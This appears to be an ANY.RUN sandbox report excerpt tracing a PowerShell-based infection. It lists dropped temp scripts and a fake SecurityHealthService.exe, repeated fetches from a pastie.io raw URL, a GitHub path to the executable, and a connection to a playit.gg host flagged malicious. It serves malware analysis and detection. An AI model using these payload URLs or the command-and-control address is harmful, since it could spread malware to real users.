3068powershell.exeC:\Users\admin\AppData\Local\Temp\ereuwize.adx.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3544powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivedbf
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
2612powershell.exeC:\Users\admin\AppData\Local\Temp\qvb5w322.jsj.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2424powershell.exeC:\Users\admin\AppData\Local\Temp\5gnbk5bp.mmx.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2160powershell.exeC:\Users\admin\AppData\Local\Temp\4a0ub35q.qz3.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3544powershell.exeC:\Users\admin\AppData\Local\Temp\SecurityHealthService.exeexecutable
MD5:7AC40671822B7D28CDF10DB295DEC6D1
SHA256:78A76137B37A67784921E8588D0361C7A805E39E80BDD229AF881B3EA02FF71A
2160powershell.exeC:\Users\admin\AppData\Local\Temp\wgqdxmq3.mod.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1560powershell.exeC:\Users\admin\AppData\Local\Temp\huzomsiz.1zm.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1560powershell.exeC:\Users\admin\AppData\Local\Temp\3ptsbue2.v4d.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
24
DNS requests
4
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3068
powershell.exe
GET
301
188.114.97.3:80
http://pastie.io/raw/fgaazw
unknown
unknown
2424
powershell.exe
GET
301
188.114.97.3:80
http://pastie.io/raw/fgaazw
unknown
unknown
3068
powershell.exe
GET
200
23.209.125.152:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?622547b1542d14b4
unknown
compressed
65.2 Kb
unknown
2612
powershell.exe
GET
301
188.114.97.3:80
http://pastie.io/raw/fgaazw
unknown
unknown
1560
powershell.exe
GET
301
188.114.97.3:80
http://pastie.io/raw/fgaazw
unknown
unknown
992
powershell.exe
GET
301
188.114.97.3:80
http://pastie.io/raw/fgaazw
unknown
unknown
3548
powershell.exe
GET
301
188.114.97.3:80
http://pastie.io/raw/fgaazw
unknown
unknown
1576
powershell.exe
GET
301
188.114.97.3:80
http://pastie.io/raw/fgaazw
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
4
System
192.168.100.255:138
whitelisted
3068
powershell.exe
188.114.97.3:80
pastie.io
CLOUDFLARENET
NL
unknown
3068
powershell.exe
188.114.97.3:443
pastie.io
CLOUDFLARENET
NL
unknown
3068
powershell.exe
23.209.125.152:80
ctldl.windowsupdate.com
Akamai International B.V.
NL
unknown
2332
SecurityHealthService.exe
147.185.221.18:36538
PLAYIT-GG
US
malicious
3544
powershell.exe
140.82.121.4:443
github.com
GITHUB
US
unknown
3544
powershell.exe
185.199.108.133:443
raw.githubusercontent.com
FASTLY
US
unknown
2424
powershell.exe
188.114.97.3:80
pastie.io
CLOUDFLARENET
NL
unknown

DNS requests

Domain
IP
Reputation
pastie.io
  • 188.114.97.3
  • 188.114.96.3
unknown
ctldl.windowsupdate.com
  • 23.209.125.152
  • 23.209.125.154
whitelisted
github.com
  • 140.82.121.4
shared
raw.githubusercontent.com
  • 185.199.108.133
  • 185.199.109.133
  • 185.199.110.133
  • 185.199.111.133
shared

Threats

PID
Process
Class
Message
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
/MalwareTeam/SecurityHealthService/raw/main/SecurityHealthService.exe